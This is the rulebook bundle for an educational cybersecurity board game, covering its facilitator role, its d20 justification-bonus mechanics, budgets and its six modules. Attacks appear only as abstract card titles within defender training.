Complete Game (All 6 Modules) — Print & Play Bundle · v2.2 Playtest Edition
A cybersecurity board game by RetroVerse Studios · CC BY-NC-SA 4.0
Print this file (Ctrl/Cmd+P) or read on screen. Card pages print best on cardstock.
docs/HOW_TO_PLAY.md
Version: 2.2 - Playtest Edition Read time: ~15 minutes. First game: ~45 minutes.
This is the learn-to-play manual — read it once, run your first game, then use the module rules as reference during play. Exact tables and numbers live in the reference docs; this manual teaches the flow.
Incident Zero is a cybersecurity board game for classrooms and training rooms. One player is the Threat Orchestrator (TO) — part facilitator, part adversary, part narrator. Everyone else is the Blue Team: security defenders making decisions under budget and time pressure.
The game's signature rule: you get better dice odds by explaining your reasoning like a real analyst. Say "we investigate suspicious activity" and you roll flat. Say "we pull the mail gateway logs to check the sender's real IP against threat intel" and you roll at +3. Talking like a professional is literally how you win — that's the point.
There are 6 modules covering the security lifecycle. Each is a standalone 30-45 minute game; they also chain together (the outcome of one feeds the setup of the next). This manual teaches Incident Response first — it's the flagship and the best hook.
Every module runs on the same engine:
roll + modifiers ≥ 11.The setup (TO does this privately, 5 min): An attacker is inside the fictional company's network. The TO secretly builds a 3-card attack chain in kill-chain order and keeps it face-down:
Suggested first chain: T-01 Phishing Campaign (INITIAL COMPROMISE / SOCIAL ENGINEERING) → T-04 Lateral Movement via SMB (PIVOT & ESCALATE / NETWORK) → T-07 Scheduled Task Persistence (PERSISTENCE / MALWARE)
The three actions (Blue Team picks ONE per turn):
| Action | Cost | On success (roll+mods ≥ 11) |
|---|---|---|
| Investigate | 5 | 1st success on a link = the TO gives a clue. 2nd success on the same link = card revealed! |
| Deploy Defense | 10/15/25 by tier | If the card's vector AND chain step match the hidden card = revealed immediately. Partial match = defense stays on the table and gives +2 to future rolls against any link matching its vector |
| Emergency Response | 15 | No roll. Contain one already-revealed threat (removes its ongoing penalty) |
The pressure (TO applies at the START of each turn): - Active Breach Cost: -5 Budget while any chain card is still unrevealed (the breach is burning money whether you see it or not) - Uncontained Threats: -5 Budget per revealed-but-uncontained threat (revealing the next card in the chain auto-contains the previous one)
When a card is revealed, the team immediately picks ONE reward: draw 2 Defense cards, +10 Budget, or Fast-Track (next Investigate succeeds on 5+).
TURN 1. TO: "Start of turn: one attacker action is still hidden — Active Breach Cost, minus 5. Budget: 95. Something is wrong at Meridian Logistics: the helpdesk queue is full of password-reset complaints. What do you do?" Team (after discussion): "Investigate. We pull the mail gateway logs and check sender domains against our threat-intel feed — if this is phishing, the return-path won't match the display name." TO: "That's a real methodology and a real tool — +2 and +1. Roll." Rolls 9. 9+3 = 12 ≥ 11 — success. TO reads a clue from T-01: "Several employees received emails claiming to be from IT, asking them to 're-authenticate'. The link goes to a look-alike domain registered 4 days ago." (First success on this link — clue only. Budget: 95 - 5 = 90.)
TURN 2. TO: "Active Breach Cost, minus 5. Budget: 85." Team: "Keep digging on the phishing — we check the mail gateway for who clicked, and pull those workstations' proxy logs." TO: "+2, +1. Roll." Rolls 10. 13 ≥ 11 — second success on the same link. TO flips T-01 face-up: "Phishing Campaign — revealed! Three users entered credentials on the fake page. This threat is now uncontained. Choose a reward." Team takes Budget Grant: 85 - 5 + 10 = 90.
TURN 3. TO: "Two cards still hidden: Active Breach minus 5. One uncontained threat: minus 5. Budget: 80. You know how they got in — you don't yet know where they went." From here, you're on your own. (A strong play: Deploy the Network Segmentation defense — if the next hidden card is network lateral movement, vector + step match reveals it instantly and auto-contains the phishing.)
Debrief prompts: What did you spend the most on, and was it worth it? Which clue actually changed your next decision? What one defense, bought before turn 1, would have changed everything?
Chaining modules: outcomes carry forward (audit gaps raise your DR costs; an IR loss sets up DR; IR's revealed chain seeds Forensics). See Module Combinations. Full lifecycle = all six in sequence, 4-5 hours across sessions.
| You want... | Read |
|---|---|
| You're the Threat Orchestrator | The TO Guide — the role, judging justifications, per-module screens |
| Exact rules for a module | docs/rules/ — core + one file per module |
| Solo/standalone setup for any module | docs/standalone-games/ |
| Every card, indexed | cards/CARD_REFERENCE.md |
| To run a playtest and report back | docs/playtesting/ |
| Variable game length & difficulty tiers | core-rules §3a |
Roll: d20 + modifiers ≥ 11 · +2 strong justification · +1 real tool/technique named · +2 matching deployed defense (IR) IR costs: Investigate 5 · Deploy 10/15/25 · Emergency Response 15 IR start-of-turn: -5 while any card hidden · -5 per uncontained revealed threat Reveal: 2 successful Investigates on a link, or 1 full-match Deploy (vector + step) · always the earliest unrevealed card Reward per reveal (pick 1): 2 Defense cards / +10 Budget / next Investigate succeeds on 5+ Turn limit: (chain cards × 2) + 1 → 3 cards = 7 turns Budgets: NB 40-60 · DR 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150
docs/TO_GUIDE.md
Version: 2.2 - Playtest Edition Audience: anyone about to run Incident Zero — teacher, trainer, or the friend who volunteered.
The Threat Orchestrator (TO) is Incident Zero's dungeon master. You wear three hats, usually in the same minute:
If you've ever run a tabletop RPG, you already have 80% of this. The remaining 20% is the adjudication rubric in §4 — it's the part that makes this game educational rather than just thematic.
A good TO makes the game. The same scenario is flat or unforgettable depending on how you deliver clues and how honestly you judge reasoning. That's why this guide exists.
The +2/+1 modifiers are the game's teaching engine. Your consistency is what makes them meaningful.
+2 — Strong technical justification. The player explains methodology: what they'll look at, and why that would reveal or stop this specific thing. - ✅ "We pull the mail gateway logs and compare the return-path against the display-name domain — spoofed senders won't match." (mechanism stated) - ✅ "Deploy EDR because living-off-the-land attacks won't trip signature AV — we need behavioral detection." (threat-to-control logic) - ❌ "We investigate the email server thoroughly." (a location is not a method)
+1 — Real tool or technique named. Wireshark, Splunk queries, Mimikatz, a MITRE technique ID, an actual CVE. - ✅ "Check LSASS access events — that's Mimikatz behavior, T1003." - ❌ "We use our security tools." (no it isn't)
Rulings that keep it fair: - Judge the reasoning, not the vocabulary. A beginner saying "check if the email really came from who it says" in plain words has the mechanism — award the +2. A buzzword salad without a mechanism gets +0. - Consistency beats generosity. Whatever bar you set on turn 1 is the bar all game. - Escalate the bar as the group learns — by session three, "we check the SIEM" that earned +1 in session one should need a specific query. Announce the escalation openly ("you're professionals now — I want specifics"). - Expert groups ("Expert Mode"): award +2 only for named artifacts, ATT&CK technique IDs, or detection logic. This is the challenge ceiling for practitioner tables — the card math never has to change. - One player monologuing every justification? Ask a different player to give it each turn ("Sam, you're on comms — why does this matter to the regulator?").
Signs it's too easy: no failed rolls; goal in sight with 40+ Budget spare; players bored. Signs it's too hard: no progress for 3+ turns; consecutive failures; frustration replacing discussion.
| Easier (pick 1-2) | Harder (pick 1-2) |
|---|---|
| Richer clues (more specific detail per success) | Vaguer clues (accurate but terse) |
| Suggest an angle through the fiction | Expert-mode justification bar |
| Shorter chain / lower tier next game | Longer chain, expansion cards |
| Beginner budgets (module max) | Minimum budgets |
Never adjust by fudging a roll or changing a printed number mid-game — players smell it, and it teaches that outcomes are arbitrary.
| Failure | Symptom | Fix |
|---|---|---|
| The Encyclopedia | You lecture after every roll | One sentence of "why," save the rest for debrief |
| The Softie | Everyone always gets +2 | Re-read §4; require the mechanism |
| The Sphinx | Clues so cryptic nobody moves | Clues must be actionable: each should suggest at least one sensible next investigation |
| The Railroader | You steer them to your solution | Multiple paths are valid; score the outcome, not the route |
| The Accountant | You narrate numbers, not events | Lead with fiction, then state the numbers |
| The Rusher | Debrief skipped because time ran out | Protect the last 10 minutes like it's the win condition — it is |
Three rounds, in order: What happened? (players narrate, you correct only facts) → Why did it work that way? (connect two or three key moments to real-world security — this is where you finally get to lecture, briefly) → What would you do differently? (go around the table; everyone answers). Losses debrief better than wins: read any unrevealed cards' "Why This Works" text aloud — it's the payoff for losing.
docs/rules/core-rules.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Incident Zero is a modular cybersecurity board game for 2+ players designed for educational environments. One player acts as the Threat Orchestrator (TO) (the facilitator), while all other players form Blue Teams (the Defenders).
Players choose which module(s) to play based on learning objectives:
Modules can be played solo or combined in any sequence using the modifier generation procedures documented in FRAMEWORK.md and Module Combinations.
Represent attacker actions. Each card includes:
- Title: e.g., "Phishing Campaign"
- Attack Chain Step: INITIAL COMPROMISE, PIVOT & ESCALATE, PERSISTENCE, or C2 & EXFIL
- Attack Vector: SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, or DATA EXFIL
- Clue: Descriptive text for the Threat Orchestrator
- Why This Works: Educational explanation (revealed after discovery)
Deck Composition: - 12 Base Threat Cards (see cards/incident-response/core-deck/threat-defense-cards.md) - 8 Expansion Threat Cards (see cards/incident-response/expansion-deck/advanced-threats.md)
Represent security controls. Each card includes: - Title: e.g., "Multi-Factor Authentication" - Countermeasure Vector: One of the six attack vectors - Tier: BASIC (10 Budget), ADVANCED (15 Budget), or ELITE (25 Budget) - Description: What the defense does and when it applies
Deck Composition: - 24 Base Defense Cards (see cards/incident-response/core-deck/threat-defense-cards.md) - 19 Expansion Defenses (see cards/incident-response/expansion-deck/advanced-defenses.md)
Examples: - BASIC: Email Authentication Setup, User Security Training, Firewall Rules (10 Budget) - ADVANCED: Multi-Factor Authentication, EDR, Network Segmentation (15 Budget) - ELITE: Threat Hunting, Memory Forensics, Deception Technology (25 Budget)
Represent sophisticated attack techniques used in Hardening module (and potentially others).
8 Core Tactics (PT-01 to PT-08): 1. PT-01: Social Engineering - Pretexting Attack 2. PT-02: Malware Evasion - Living-off-the-Land Technique 3. PT-03: Credential Dumping - Mimikatz Attack 4. PT-04: Lateral Movement - Network Traversal 5. PT-05: Privilege Escalation - Unpatched Kernel Exploit 6. PT-06: Data Exfiltration - Unmonitored Channel 7. PT-07: Supply Chain Compromise - Trusted Software Update 8. PT-08: Insider Threat - Malicious Administrator
See cards/hardening/core-deck/pentester-tactic-cards.md for full card text, plus 8 expansion tactics (PT-09 to PT-16) in advanced-tactics.md.
Simple cards providing scenario context. Examples: - Email Server - Customer Database - Domain Controller - Web Application - Backup System - Developer Workstation
Physical Components: - One 20-sided die (d20) - Turn Tracker (paper or board, counts 1-12+) - Budget Tracker (shows 0-150+) - Reputation/Security Score Tracker (shows 0-100) - Uncontained Threats Tracker (shows 0-5) - Tokens or counters (for tracking upgrades, penalties)
Optional: - Score sheets (printable or paper) - Playbook tracking sheet - Stakeholder communication log (for Disaster Recovery)
When Used: Investigation, Defense Deployment, Negotiation, and similar actions that have uncertain outcomes.
How It Works:
1. Player announces action and parameters
2. Player rolls 1d20 (one 20-sided die)
3. Compare result to target number (usually 11+) plus modifiers
4. Success if: roll + modifiers ≥ target number
Example:
Action: Investigate email headers
Target: 11+
Roll: 7
Modifiers: +2 (technical justification) +1 (referenced Splunk)
Calculation: 7 + 2 + 1 = 10
Result: FAIL (10 < 11)
What is Budget? Abstract resource representing time, money, personnel, and tools. Spent to take actions, buy defenses, or conduct investigations.
Budget Allocation by Module: - Network Building: Start at 40-60 (by difficulty; see module rules) - Hardening: Start at 150 (or carry over from IR) - Incident Response: Start at 100 - Disaster Recovery: Start at 50 (emergency fund) - Forensics: Start at 75 - Audit & Compliance: Start at 100 (used only for optional remediation cards)
Budget Spending: - Investigate action: 5 Budget - Deploy Defense: 10/15/25 Budget (by tier) - Emergency Response (IR): 15 Budget (v2.2; was 25) - Active Breach Cost (IR, v2.2): -5 Budget at start of each turn while any chain card remains unrevealed - Harden Upgrade (Hardening): 5 Budget - Create Playbook (Hardening): 10 Budget - Crisis Action cards (DR): 5-20 Budget per card (ACTION-01 to ACTION-12; the free "Holding Statement" costs 0) - Ransom Decision (DR, ACTION-13): Pay 20 / Negotiate 5 / Refuse 0
Budget = 0: Team loses (cannot take further actions)
Exception (Disaster Recovery, v2.2): Budget floor is 0 and the free Holding Statement action remains available — DR is never lost by running out of Budget; DR's loss condition is any stakeholder trust reaching 0%.
Turns represent: Time passing in the game world (6 hours, 30 minutes, or abstract unit depending on module)
Turn Sequence: 1. Start of Turn: Penalties applied, trackers announced 2. Planning Phase: Team discusses strategy (2-3 min) 3. Action Phase: Execute chosen action, resolve rolls 4. End of Turn: Advance tracker, draw card, check events
Philosophy: In real incident response, some attacks move fast (hours), some take months. Fixed turn lengths feel unrealistic. This system adds realism without requiring complex calculations.
Default Formula: (Attack Chain Cards × 2) + 1
This gives attackers enough time to progress realistically while keeping games manageable:
| Attack Chain | Formula | Turn Count | Session Duration |
|---|---|---|---|
| 3 cards | (3 × 2) + 1 | 7 turns | 30-40 min play |
| 4 cards | (4 × 2) + 1 | 9 turns | 35-45 min play |
| 5 cards | (5 × 2) + 1 | 11 turns | 40-50 min play |
| 6 cards | (6 × 2) + 1 | 13 turns | 45-55 min play |
How to Use Default Formula: 1. Choose number of threat cards in attack chain (3, 4, 5, or 6) 2. Apply formula: (Cards × 2) + 1 = Turn Count 3. Announce turn count to Blue Team 4. Play game normally with that turn limit
Example Setup:
"I've created a 4-card attack chain. That's (4 × 2) + 1 = 9 turns. You have 9 turns to detect all four threats. Go!"
Advanced Threat Orchestrators can use a Tier + d4 system for more control and variability:
Step 1: Select Attack Complexity Tier
| Tier | Turn Base | Attack Profile | Example |
|---|---|---|---|
| TIER 1 | 5-7 | Simple & obvious | Script kiddie using public tools |
| TIER 2 | 8-10 | Standard sophistication | Organized cybercriminal group |
| TIER 3 | 11-13 | Highly sophisticated | APT with operational security |
| TIER 4 | 14-16 | Expert/Nation-state | State-sponsored group |
Step 2: Add Randomness (Optional)
Roll 1d4 for variation: - Roll 1: -1 turn (tight timeline) - Roll 2 or 3: ±0 turns (no change) - Roll 4: +1 turn (extended dwell time)
Final Turn Count = Tier Base + d4 Result
Example Advanced Setup:
"This is a TIER 2 attack (organized cybercriminals). Base is 8-10 turns. I'll roll d4 for variation... [rolls 4, +1 turn]. Final turn count: 9-11 turns."
These rules protect game balance and prevent metagaming:
The Rule: Threat Orchestrators MUST accept the random result, even if it feels impossibly tight or loose.
Why: Real incident response is unpredictable. Sometimes attacks happen faster or slower than expected.
Example Scenarios: - TIER 3 attack (11-13 base) + d4 roll of 1 = 10-12 turns (tighter than expected, but realistic) - TIER 1 attack (5-7 base) + d4 roll of 4 = 6-8 turns (easier conditions, but acceptable)
When Chaos Feels Realistic: - Tight timeline: "The attacker worked faster than expected—they had prior knowledge" - Loose timeline: "The attacker was cautious, spending weeks in reconnaissance before striking"
Implementation: Lean into the randomness as realistic incident variability.
The Rule: Blue Team CANNOT deduce the attack tier from the announced turn count. They cannot ask "Is this TIER 2?" or "Is this TIER 4?" based on how many turns they have.
Why: Real incident response doesn't come with difficulty labels. Attackers don't advertise sophistication. Players should discover complexity through gameplay (attack chain complexity, defender evasion, tool sophistication, etc.).
What Players CAN Ask: - "What are the suspicious network events?" (leads to understanding threats) - "Can we analyze the malware?" (reveals attacker sophistication through findings) - "Why did this attack succeed?" (post-game discussion)
What Players CANNOT Ask: - "Is this a TIER 2 attack?" (deriving tier from turn count) - "This looks like a TIER 1 because we have 7 turns" (meta-gaming difficulty)
Implementation: Respond to difficulty questions by saying "Investigate and find out!" Players discover sophistication through evidence, not from turn counts.
The Rule: ONLY after rolling d4, the Threat Orchestrator may apply an optional ±1 turn adjustment IF the rolled result feels genuinely unreasonable for the scenario.
When to Use (Rare): - Scenario setup is unusually complex (multiple attack vectors, coordination across systems) - Player group is new and needs slightly easier conditions - Real-world incident being taught had specific timeline constraints
When NOT to Use (Prefer Random): - "The roll feels unlucky" (accept the chaos) - "I want this exactly 10 turns" (let dice decide) - "The attack chain is long so it should take longer" (that's what TIER system handles)
Implementation: 1. Roll d4 normally 2. Announce rolled result 3. ONLY IF genuinely unreasonable, apply ±1 modifier and explain why 4. Document the override for consistency in future scenarios
Example Valid Use:
"TIER 2 base 8-10, rolled -1 = 7-9 turns. That's tight given we have 5-card attack chain, so I'm adding +1 modifier (explaining the discovery is methodical). Final: 8-10 turns."
Example Invalid Use:
"I rolled 8-10 but I want 10-12, so I'm adding +2." (NO - use the roll as-is)
For Beginners (Use Default Formula): - [ ] Choose attack chain length (3, 4, 5, or 6 cards) - [ ] Calculate: (Cards × 2) + 1 - [ ] Announce turn count - [ ] Play
For Advanced (Use Tier + d4): - [ ] Select TIER (1, 2, 3, or 4) - [ ] Announce TIER basis (not the number, just why it's that complexity) - [ ] Roll d4 for variation (hidden or public, your choice) - [ ] Calculate final turn count - [ ] Apply Rule 3 modifier if genuinely needed (rare) - [ ] Announce final turn count WITHOUT revealing tier
Default Formula: Turn Count = (Attack Cards × 2) + 1
Tier System: - TIER 1: 5-7 turns (simple) - TIER 2: 8-10 turns (standard) - TIER 3: 11-13 turns (advanced) - TIER 4: 14-16 turns (expert) - Add d4 roll: -1, 0, 0, or +1
Golden Rules: 1. Accept any roll (embrace chaos) 2. Never reveal tier to players 3. Modifier authority only when truly needed (rare)
All modules use the same modifier system for consistency:
Awarded when a player provides clear, specific reasoning for their action using real security concepts.
Examples: - "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds" - "We're deploying EDR on all endpoints because it can detect living-off-the-land techniques" - "We're querying our SIEM for scheduled task creation events because attackers use them for persistence"
Criteria: - References specific tools (Splunk, EDR, SIEM, etc.) - Explains methodology (why this approach works) - Shows understanding of the threat being addressed
Awarded when player references actual security tools or real attack/defense techniques.
Examples: - "We'll use Wireshark to analyze the network traffic" - "We're checking for Mimikatz usage in memory" - "We're reviewing EDR telemetry" - "We're looking for this specific CVE exploitation pattern"
Criteria: - References real tools (Wireshark, EDR, Splunk, etc.) - References real techniques (MITRE ATT&CK, specific CVEs) - Shows awareness of how things actually work
When Applied: Incident Response module only, applied at START of each turn
How It Works: 1. When a threat card is revealed, add 1 to Uncontained Threats Tracker 2. At START of each turn, deduct 5 Budget per uncontained threat 3. When next card in chain is revealed, previous threat is auto-mitigated (-1 from tracker) 4. When Emergency Response action is used (15 Budget), remove a revealed threat (-1 from tracker)
Companion rule — Active Breach Cost (v2.2): while at least one chain card remains unrevealed, deduct an additional flat -5 Budget at the start of each turn. Hidden attackers cost money too.
Purpose: Creates urgency - dwell time costs money, whether you've found the attacker yet or not. Teaches real-world incident response costs.
Example (uncontained penalty only; Active Breach Cost also applies while cards remain hidden):
Turn 1: Phishing revealed → Uncontained Threats = 1
Turn 2: START → Deduct 5 Budget (95 remaining from 100)
Turn 3: Lateral Movement revealed → Phishing auto-mitigated (Uncontained = 1)
Turn 3: START → Deduct 5 Budget
Turn 4: Emergency Response on Lateral Movement (15 Budget) → Uncontained Threats = 0
Responsibilities: - Manage game state and track turns/budget - Describe scenarios and outcomes - Roll dice when action outcomes are uncertain - Guide the narrative
During Incident Response: - Create and manage hidden attack chain - Provide clues based on successful investigations - Control Uncontained Threats penalties - Be fair but challenging
During Other Modules: - Describe threat context and defenses - Draw Pentester Tactic cards (Hardening) - Manage timeline and deadlines (Disaster Recovery) - Guide debrief questions
Universal Tips: - Explain why actions succeed or fail - Ask clarifying questions about player strategy - Balance challenge with learning - Provide constructive feedback
Responsibilities: - Discuss strategy as a team - Choose one action per turn - Justify your decisions (gain +2 modifier) - Manage budget carefully - Learn from success and failure
Key Rule: Modifiers are additive and can stack.
Example (Hardening Module, canonical formula — v2.2):
Pentester Tactic: PT-02 Living-off-the-Land (DC 13)
Defense roll = d20
+ printed bonus for the ONE defense chosen (D-08 EDR vs PT-02: +3)
+ hardening upgrades on that defense (+2 each; one upgrade: +2)
+ relevant playbook (+3)
Team rolls 8:
8 + 3 (EDR) + 2 (upgrade) + 3 (playbook) = 16 ≥ 13 = SUCCESS
Only the single chosen defense's printed bonus applies — deployed defenses do not stack with each other against one tactic.
| Length | Difficulty | Best For |
|---|---|---|
| 3 cards | Beginner | Learning mechanics, 30 min sessions |
| 4 cards | Intermediate | Standard play, 40 min sessions |
| 5 cards | Advanced | Challenge play, full kill chain |
| Budget | Difficulty | Best For |
|---|---|---|
| 60 | Hard | Resource scarcity, tough choices |
| 100 | Standard | Balanced play, most scenarios |
| 150+ | Easy | Strategic depth, multiple options |
| Turns | Difficulty | Best For |
|---|---|---|
| 8 | Hard | Time pressure, fast play |
| 10 | Standard | Balanced, most scenarios |
| 12 | Easy | Exploration, learning |
Note (v2.2): Incident Response derives its turn limit from the Variable Game Length formula — (Attack Chain Cards × 2) + 1 → 7/9/11 turns (see §3a). The table above is for modules with educator-set limits.
| Module | Primary Learning | Secondary Learning |
|---|---|---|
| Incident Response | Cyber kill chain, attack detection, investigation | Resource prioritization, incident response |
| Hardening | Defense-in-depth, layering, proactive security | Cost-benefit analysis, security architecture |
| Disaster Recovery | Crisis management, stakeholder communication | Risk assessment, incident cost |
| Network Building | Network design, asset security, architecture | Infrastructure hardening, threat modeling |
| Forensics | Digital forensics, chain of custody, attribution | Evidence handling, MITRE ATT&CK mapping |
| Audit & Compliance | Security assessment, governance, compliance | Risk identification, remediation prioritization |
| Mechanic | What It Teaches |
|---|---|
| d20 roll system | Uncertainty, risk, informed decision-making |
| Budget constraints | Resource allocation, prioritization |
| Justification bonuses | Technical reasoning, tools/techniques knowledge |
| Uncontained Threats penalty | Urgency, cost of dwell time |
| Pentester Tactics | Attacker sophistication, defense limitations |
| Playbook system | Preparation, incident response planning |
| Scoring systems | Outcome measurement, quality assessment |
Implementation: - Same setup for all teams - Teams cannot share information (Incident Response) - Score comparison determines winner (Hardening) - Reputation comparison (Disaster Recovery)
Every module should include a 5-15 minute debrief with three sections:
Too Easy Signs: - Team reveals all cards/achieves goal with 40+ budget remaining - No failed rolls - No meaningful decisions required - Team is bored
Too Hard Signs: - Team is stuck/making no progress after 5 turns - Multiple consecutive failed rolls - Team frustrated rather than challenged - No learning happening
Adjustment Options: - Easier: Provide better clues, more starting budget, fewer tactics - Harder: Less specific clues, lower budget, more tactics - Faster: Shorter turn limits, simpler scenarios - Slower: More turns, more complex scenarios
For complete card descriptions, see: - Base Threat & Defense Cards cards/incident-response/core-deck/threat-defense-cards.md - Expansion Threats cards/incident-response/expansion-deck/advanced-threats.md - Expansion Defenses cards/incident-response/expansion-deck/advanced-defenses.md - All decks indexed cards/CARD_REFERENCE.md
For complete rules on each module:
For your first game: 1. Choose a module from Module Combinations 2. Read the module-specific rules 3. Read the standalone setup guide 4. Prepare your scenario 5. Play!
For multiple modules: 1. Refer to Module Combinations for recommended sequences 2. Refer to FRAMEWORK.md for modifier generation procedures 3. Play first module, generate modifiers for next 4. Continue as desired
Incident Zero: Core Rules & Mechanics v2.1 - Balanced & Refined Edition Universal rules for all modules
docs/FRAMEWORK.md
Incident Zero is a modular, flexible educational game system. Rather than a rigid "phase" structure, we offer 6 interchangeable modules that educators can combine in any way that serves their learning objectives.
Duration: 30-45 minutes (solo), 20-35 minutes (in combination) Focus: Attack detection, investigation, incident response Best For: Teaching cyber kill chain, investigation methodology, budget prioritization
Standalone: Players detect a hidden attack chain through investigation and defense deployment In Combination: Outcome (win/lose) and discovered cards modify subsequent modules
Duration: 30-45 minutes (solo), 20-30 minutes (in combination) Focus: Defense-in-depth, security architecture, proactive hardening Best For: Teaching layered security, strategic planning, cost-benefit analysis
Standalone: Players build comprehensive defenses against known threat vectors In Combination: Discovered threats (from Incident Response) guide defense strategy; OR defenses are generated via dice/cards
Duration: 30-45 minutes (solo), 25-35 minutes (in combination) Focus: Crisis management, forensics, stakeholder communication Best For: Teaching incident response procedures, risk management, decision-making under pressure
Standalone: Players manage a breach crisis with budget constraints and reputation scoring In Combination: Breach scope determined by Incident Response outcome; OR generated at setup
Duration: 30-45 minutes (solo), 15-25 minutes (in combination) Focus: Network architecture, asset security, foundational infrastructure Best For: Teaching network design, critical asset identification, infrastructure hardening
Standalone: Players design and secure a network from scratch In Combination: Network design becomes prerequisite for all other modules; OR used as rebuild scenario after Incident Response
Duration: 30-45 minutes (solo), 25-35 minutes (in combination) Focus: Digital forensics, evidence handling, attack attribution Best For: Teaching chain of custody, investigation methodology, MITRE ATT&CK technique mapping
Standalone: Players investigate a compromised system, gathering evidence to build attribution, timeline, attack chain, and chain-of-custody progress In Combination: Investigates the breach from Incident Response or Disaster Recovery; discovered evidence informs Hardening or Audit priorities
Duration: 30-45 minutes (solo), 15-20 minutes (in combination) Focus: Security compliance, audit procedures, governance Best For: Teaching regulatory frameworks, security assessment, governance workflows
Standalone: Players conduct security audits and address findings In Combination: Findings from Incident Response guide audit focus; OR used post-Hardening to validate controls
Each module can modify the next module in several ways:
Play any single module standalone. All modifiers are generated during setup via: - Dice rolls (d20 for random element) - Card draws (threat, defense, or scenario cards) - Educator narrative choices - Difficulty selection (Beginner/Intermediate/Advanced)
Examples: - Incident Response solo - Hardening solo - Disaster Recovery solo - Network Building solo - Forensics solo - Audit & Compliance solo
Path A: Building → Defending
Network Building → Incident Response → Hardening
Path B: Crisis & Response
Incident Response (Loss) → Disaster Recovery → Audit
Path B2: Detect & Investigate
Incident Response → Forensics
Path C: Build, Test, Fix
Network Building → Audit → Hardening
Path D: Complete Lifecycle
Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit
Educators can mix modules any way they choose: - "We want Incident Response, then straight to Audit" - "Network Building + Hardening, no incident" - "Just Disaster Recovery for crisis training" - "Audit first, then rebuild with Hardening"
For any custom sequence: 1. Identify the first module → play normally with generated setup 2. For each subsequent module → during setup, generate any missing modifiers that would normally flow from prior modules
When modules aren't combined sequentially, educators create modifiers at setup using:
Scenario Deck: Pre-written scenario cards describing: - Network layouts (if starting mid-way) - Threat context (if starting without Incident Response) - Compliance requirements (if starting without Audit) - Budget constraints (if starting mid-lifecycle)
Dice Methods: Randomized setup parameters: - Roll d20 for network security level - Roll d20 for breach scope (for Disaster Recovery solo) - Roll d20 for compliance findings (for Audit solo)
Educator Narrative: Direct creation based on: - Learning objectives - Time available - Difficulty desired - Real-world inspiration
Example:
Educator wants: Network Building → Disaster Recovery (no Incident Response)
Setup for Disaster Recovery:
- Educator describes network built in prior module
- Generate breach scenario via dice or narrative:
"Roll 2d6: (3,5) = Insider threat, moderate data loss"
"Modifiers: Budget=60, Reputation=100, Dwell time=24 hours"
- Play Disaster Recovery with those generated modifiers
"Phases" implies: - ❌ Linear progression (1→2→3) - ❌ Specific sequence required - ❌ All elements must be played - ❌ Rigid pedagogical structure
"Modules" enables: - ✅ Non-linear play - ✅ Flexible educator choice - ✅ Partial/complete experiences - ✅ Adapts to learning objectives - ✅ Combines in any sequence
START: What do you want to teach?
├─ "Incident response basics"
│ └─ Play: Incident Response module solo
│ (30-45 min, fast, focuses on detection)
│
├─ "Network security & architecture"
│ └─ Play: Network Building module solo
│ (30-45 min, strategic planning focus)
│
├─ "Defense-in-depth"
│ └─ Play: Hardening module solo
│ (30-45 min, layering & strategy)
│
├─ "Crisis management"
│ └─ Play: Disaster Recovery module solo
│ (30-45 min, pressure & decisions)
│
├─ "Compliance & governance"
│ └─ Play: Audit & Compliance module solo
│ (30-45 min, assessment & findings)
│
├─ "Digital forensics & attribution"
│ └─ Play: Forensics module solo
│ (30-45 min, evidence & investigation)
│
├─ "Complete incident lifecycle"
│ └─ Play: Incident Response → Disaster Recovery → Audit
│ (90-120 min, full arc, defeat scenario)
│
├─ "Defensive preparation"
│ └─ Play: Network Building → Hardening
│ (60-90 min, proactive focus)
│
├─ "Design, audit, defend"
│ └─ Play: Network Building → Audit → Hardening
│ (90-120 min, planning-focused)
│
├─ "Everything"
│ └─ Play: Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit
│ (4-5 hours, comprehensive, advanced)
│
└─ "Custom"
└─ Pick any combination, generate modifiers for gaps
Every module includes: - Setup (5 minutes): Configure difficulty, generate modifiers - Gameplay (20-35 minutes): Core decision-making and rolls - Scoring/Outcome (5 minutes): Determine results - Debrief (5-15 minutes): Reflect on decisions and learning
Resource Management: - Budget (Incident Response, Hardening, Disaster Recovery, Network Building, Forensics) - Time/Turns (all modules) - Reputation/Morale (Disaster Recovery, Audit) - Progress Meters (Forensics: Attribution, Timeline, Attack Chain, Chain of Custody)
Decision Making: - Choose action from limited options (3-5 choices) - Roll d20 for success/failure - Technical justification bonuses (+2, +1) - Accept consequences or trade-offs
Modifiers & Penalties: - Uncontained Threats (Incident Response) - Pentester Tactics (Hardening) - Compliance Violations (Audit) - Network Vulnerabilities (Network Building) - Breach Scope (Disaster Recovery) - Anti-Forensics & Evidence Degradation (Forensics)
Debrief Questions: - What was the decision point? - What would you do differently? - How does this reflect reality? - What did you learn?
Which modules work well together?
IR Hard DR Net For Audit
Incident Resp. - ✓✓ ✓✓ ✓ ✓✓ ✓
Hardening ✓✓ - ✓ ✓✓ ✓ ✓✓
Disaster Rec. ✓✓ ✓ - ✓ ✓✓ ✓✓
Network Build. ✓ ✓✓ ✓ - ✓ ✓✓
Forensics ✓✓ ✓ ✓✓ ✓ - ✓✓
Audit ✓ ✓✓ ✓✓ ✓✓ ✓✓ -
Legend:
✓✓ = Highly compatible (strong modifier flow)
✓ = Compatible (weak modifier flow, mostly independent)
- = Same module (obviously)
Example:
- Incident Response + Forensics = ✓✓ (revealed attack chain feeds the investigation)
- Network Building + Hardening = ✓✓ (complementary)
- Forensics + Audit = ✓✓ (findings drive assessment focus)
To support module flexibility:
docs/
├── FRAMEWORK.md # THIS FILE - Module philosophy & combinations
├── module-combinations.md # Educator guide to combining modules
├── rules/
│ ├── core-rules.md # Core mechanics (timeless)
│ ├── module-incident-response.md # Full IR rules
│ ├── module-hardening.md # Full Hardening rules
│ ├── module-disaster-recovery.md# Full DR rules
│ ├── module-network-building.md # Full Network rules
│ ├── module-forensics.md # Full Forensics rules
│ └── module-audit-compliance.md # Full Audit rules
└── standalone-games/
├── incident-response.md # IR solo setup & play
├── hardening.md # Hardening solo setup & play
├── disaster-recovery.md # DR solo setup & play
├── network-building.md # Network solo setup & play
├── forensics.md # Forensics solo setup & play
└── audit-compliance.md # Audit solo setup & play
Current: v2.2 (Playtest Edition)
